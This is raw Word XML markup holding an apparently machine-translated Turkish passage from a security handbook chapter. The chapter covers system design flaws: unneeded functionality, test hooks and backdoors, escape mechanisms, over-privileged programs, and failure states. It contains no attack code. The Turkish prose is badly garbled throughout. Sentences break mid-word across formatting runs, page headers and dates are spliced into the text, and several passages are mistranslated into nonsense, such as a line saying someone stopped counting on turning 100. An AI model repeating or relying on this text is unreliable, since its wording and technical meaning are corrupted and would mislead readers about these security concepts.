    <w:p w:rsidR="00E77DF4" w:rsidRPr="00955814" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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 xml:space="preserve">İlgili ancak daha da kötüsü bir tasarım veya uygulama hatası, işlevsellik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uygulamasına dahil edilmesidir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bu kullanım amacı veya uygulama için doğal değildir veya gerekli değildir. Çünkü </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>güvenlik sisteme bağlı olabilir</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sadece amaçlananı yapmak, bu büyük bir hata ve sorunların kaynağıdır. Bu tü</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r bir işlevselliğin varlığında,</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AU1997_Frame_Ch126 Sayfa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1550 14 Kasım 2003, Cuma 06:03</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Genel Sistem Tasarım Hata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ları ve Güvenlik Sorunları 1551</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yalnızca kullanıcının yalnızca uygun uygulama ayrıcalıklarına sahip olması</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nı sağlamak değil, aynı zamanda</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kullanıcı t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>amamen alakasız bir şey alamaz.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Son zamanlarda, bir E-ticaret Web sunucusu uygulamasının uygulayıcısı d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>üşünülemez olanı yaptı; o okudu</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dokümantasyon. Yazılımın herhangi birini görüntülemek, kopyalamak veya düzenlemek için kullanılabilecek bir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>komut dosyası içerdiğini buldu.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sunucuya görünür olan veri nesnesi. Komut dosyası, bilgisayara bağlı herhangi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bir tarayıcıdan başlatılabilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sunucusu. Bu senaryonun kullanımı için gerekli olmadığını kabul etti. Daha da kötüsü, onun sistem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>indeki varlığı onu ortaya koydu</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> risk; Senaryonun ismini bilen herkes onun sisteminden faydalanabilir. Diğer tüm kul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lanıcıların olduğunu fark etti.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uygulama bu komut dosyasının adını biliyordu. Ne kadarını görmek için Net’te bulunan su</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nucuları aramaya karar verildi.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bu betiğin kopyaları bulunamadı. 100 yaşına geldiğind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e saymayı bıraktığı bildirildi.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bunun bir biçimi, programın asıl amacı için tasarlanan kancaları, iskelel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eri ya da araçları bırakmaktır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Test amaçlı Bir diğeri ise programın yazarını programdan atlamak için izin veren </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>arka kapıların kullanılmasıdır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kontrolleri. Yine bir diğeri, başvuru ile ilgili olmayan kamu hizmetlerinin dahil edilm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>esidir. Daha başarılı ve hassas</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> uygulama, başkaları tarafından keşfedilme ve sömürülme potansiyel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">i daha yüksek. Daha fazla kopya, </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kullanılan programın sorunu ne kadar büy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ükse çözüm de o kadar zor olur.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ücretsiz bir işlevselliğin çok ciddi bir formu bir kaçış mekanizmasıdı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ŞIRI AYRICALIK</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IBM AS / 400 gibi birçok çok kullanıcılı, çok uygulamalı siste</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mler ve UNIX'in çoğu uygulaması</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bir programın atananların dışındaki ayrıcalık ve yeteneklerle çalışmasına iz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in verecek bir mekanizma içerir</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kullanıcıya Kavram, böyle bir yeteneğin erişim kontrolü sağlamak iç</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in kullanılabileceği görülüyor.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Veri nesnesine tam erişim ile sağlanacak olandan daha küçük ve daha</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kısıtlayıcıdır. Rağmen yapamam</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> erişim nesnesi A, kullanıcının A nesnesine erişmek </w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>için ayrıcalıklı b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ir programa erişebileceği ancak </w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kullanıcıya yalnızca A nesnesinin belirli bir alt kümesini gösterirdi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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Bununla birlikte, uygulamada, başvurunun ayrıcalıklarla çalışmasına izin v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ermek için sıklıkla kullanılır.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Programcı hatta sistem yöneticisi olanlar. Bu tür kullanımın bir zorluğu, kull</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>anıcı yönettiğinde ortaya çıkar</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> uygulamadan işletim sistemine kaçmak, ancak daha ayrıcalıklı durumu korum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ak. Başka biri kendini gösterir</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> başlatılan bir işlem, alt sistem veya arka plan programı aşırı ayrıcalıkla çalış</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tığında. Örneğin, posta servisi</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> amaç için oluşturulmuş bir profil yerine, sistem yöneticisinin ayrıcalıklarına sah</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ip olacak şekilde kurulmalıdır.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bu uygulamanın kontrolünü ele geçiren, örneğin arabellek taşması veya kaçış mekanizmasıyla saldırgan, şimdi sistemi, yalnızca uygulamanın veya kullanıcının sahiplerinin gerektirdiği ayr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ıcalıklarla değil, aynı zamanda Sistem yöneticisi olanlar.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Biri, kusurlu bir programın aşırı imtiyazlı böyle bir tesadüfün muht</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>emel olmadığını iddia edebilir</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Bununla birlikte, deneyim bunun sadece olası değil aynı zamanda yaygın olduğunu da gösterme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ktedir. Bir daha iddia edebilir</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> uygulama programcısının bu sorunun sadece bir kısmına neden olduğunu; ger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i kalanı ise sorumluluğundadır.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sistem programcısı veya sistem yöneticisi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Bununla birlikte, uygulamada,</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Programın tamamen ayrıcalıklı olması ve ayrıcalıkların istendiği şekilde uygulama programına verilmesi.</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7E79CF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2700"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003A072B"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YRICALIKLI DURUM</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1.1. Ayrıcalıklı Durum Başarısızlığı</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lama programları, genellikle tamamen kontrol dışındaki nedenlerden dolayı, programcılarının programlarında ba</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>şarısız olur</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> veya kullanıcılarının. Kural olarak, bu tür başarısızlıklar nispeten iyi huyludur. Bazen, başarısızlık</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> verilerini ortaya çıkarır veya çevreleri. </w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Olası arıza modalarını karşılaştırarak bunu anlamak en k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>olay yoldur. Güvenlik açısından</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bir uygulamanın başarısızlığa uğramasının en güvenli hali, sistemin durmasıdır. Elbette, bu aynı zam</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>anda en azını bırakan durumdur.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kullanıcı ve sistem ve uygulama yönetimi için seçenekler. Sistemi yenide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n başlatmak zorunda kalacaklar,</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">AU1997_Frame_Ch126 Sayfa 1552 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>14 Kasım 2003, Cuma 06:03</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Genel Sistem Tasarım Hata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ları ve Güvenlik Sorunları 1553</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yeniden yükleyin ve uygulamayı yeniden başlatın. Bu en güvenli durum olsa da, en düşük</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> durum olan devlet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>olmayabilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> İyileşme zamanı. Sistem operatörleri çoğu zaman başarısızlığa uğramak için uzun süreden fazla bir sürede iyileşm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e için kısa süreye değer verir.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
